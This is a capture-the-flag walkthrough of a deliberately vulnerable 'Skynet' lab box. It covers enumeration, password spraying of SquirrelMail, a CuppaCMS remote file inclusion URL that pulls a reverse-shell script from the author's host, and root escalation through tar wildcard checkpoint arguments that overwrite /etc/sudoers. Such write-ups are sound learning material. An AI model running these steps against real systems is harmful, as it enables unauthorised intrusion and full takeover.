This was a fun box

This room was good fun and involved a few different techniques to complete.  There was a lot of enumeration and an interesting new technique I learned to escalate privileges.

Ports

I started the same way as always, by running a port scan on the server.  This returned the following.

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

I notice there is a web server and some Samba ports open, so I decide to investigate these further.

Enumeration

Directory

I run gobuster to see if I can find any hidden directories.

┌──(gareth㉿SRF239-L)-[~/Desktop/Files/Skynet]
└─$ gobuster dir -u http://10.10.237.150 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.237.150
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/09 05:01:22 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2021/01/09 05:01:46 Finished
===============================================================

The /admin and /squirrelmail directories are the most interesting to me at this stage. I also decide to enumerate the samba server and see if I can find any open shares.

Samba

I ran the enum4linux.sh script against the server and it returned a lot of information.  The most useful of which was the following:

 ==============================
|    Users on 10.10.237.150    |
 ==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson       Name:   Desc:

user:[milesdyson] rid:[0x3e8]

 ==========================================
|    Share Enumeration on 10.10.237.150    |
 ==========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
        
[+] Attempting to map shares on 10.10.237.150
//10.10.237.150/print$  Mapping: DENIED, Listing: N/A
//10.10.237.150/anonymous       Mapping: OK, Listing: OK
//10.10.237.150/milesdyson      Mapping: DENIED, Listing: N/A
//10.10.237.150/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ========================================================================
|    Users on 10.10.237.150 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\milesdyson (Local User)

So I know there is a user on the system with the username milesdyson, and there's an anonymous samba share I can connect to and explore.  Upon exploration of this samba share I find a file called log1.txt which appears to contain a list of terminator-related passwords.

SquirrelMail

So now I have a potential username and a list of what appears to be passwords.  I use this list of passwords and try to login to the SquirrelMail instance at http://10.10.237.150/squirrelmail.  I manage to find the correct password after running the list through burpsuite.

This looks interesting

I was really glad this email login was not a dead-end.  With this password, I was able to connect to the previously enumerated samba share milesdyson.  In this share, there was a text file which mentioned a directory I had not discovered.

important.txt

CuppaCMS

After visiting the URL and enumerating it with gobuster, I discovered the administrator login URL, which revealed that this particular site was an instance of CuppaCMS.  I had not heard of CuppaCMS before but I was certain there must exist some kind of vulnerability for it.  I did a quick search using searchsploit and discovered there is a Remote File Inclusion vulnerability, 25971.

To exploit this vulnerability I didn't even need to login, I can simply visit a URL which is hosting my reverse-shell PHP code, and then I have a shell on the server.

I set up a netcat listener on port 4444 and visited this address in my browser.

http://10.10.237.150/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.145.210:8080/reverse-shell.php

This works because of a line of code in /alert/alertConfigField.php in the CuppaCMS which had the line <?php include($_REQUEST["urlConfig"]); ?>.  This will automatically execute the contents of whatever is found in the urlConfig variable value passed in by the GET request.  In this instance, my reverse shell script.

After gaining shell access as the www-data user I was able to cat the user.txt file to get my first flag.

Privilege Escalation

I now have a set of steps I undertake manually on any server after I gain shell access, before running automated enumeration tools like linpeas.  This includes scanning for any binaries with the SUID bit set, checking which commands (if any) I can run as sudo, and checking to see whether or not there are any crontab scripts scheduled to run as the root user.

$ cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Crontab

From checking the crontab file I discovered a script that runs every minute from inside the /home/milesdyson/backups directory called backup.sh.  The contents of this backup.sh file revealed that it was taking a tar backup of the contents of the /var/www/html directory.  A directory which, as the www-data user, I can write to.

Exploiting tar with wildcard

$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

The interesting part here is that the script is using the * wildcard asterisk to tell the script to include every file in the directory.  If this was not used, you would have to manually include the path of each file you wanted to include in the tar file, like so

tar cf /home/milesdyson/backups/backup.tgz /var/www/html/index.html /var/www/html/index.js ...

If you want to add any additional command-line arguments to the tar binary, you can also include those in amongst the filenames.  Those begin with --.

It is, however, possible to create files that have a name beginning with – and get the tar binary to execute those as command-line arguments, rather than interpreting them as files to be zipped.

With that in mind, I created a bash script to grant the www-data user permission to run all commands as sudo without being prompted for a password and saved it as root.sh

echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers
root.sh

I then created the following two files in the /var/www/html directory.  When creating files which begin with - you have to specify the absolute path or it will not work, hence the pwd command beforehand, which gets the present working directory.

$ touch $(pwd)/--checkpoint-action=exec=sh\ root.sh
$ touch $(pwd)/--checkpoint=1

The tar documentation explains that the --checkpoint command argument is to periodically execute arbitrary actions.  That is just what we want to do.

I then waited one very long minute for the cronjob to execute.

Eventually, I was able to run sudo -u root /bin/bash and cat /root/root.txt to capture the remaining flag.

Summary

I really enjoyed this room as it felt like a somewhat realistic scenario that one might find on an actual server, with a few hoops to jump through to find the vulnerability to exploit.  I also enjoyed learning about how to use the tar binary to gain privilege escalation.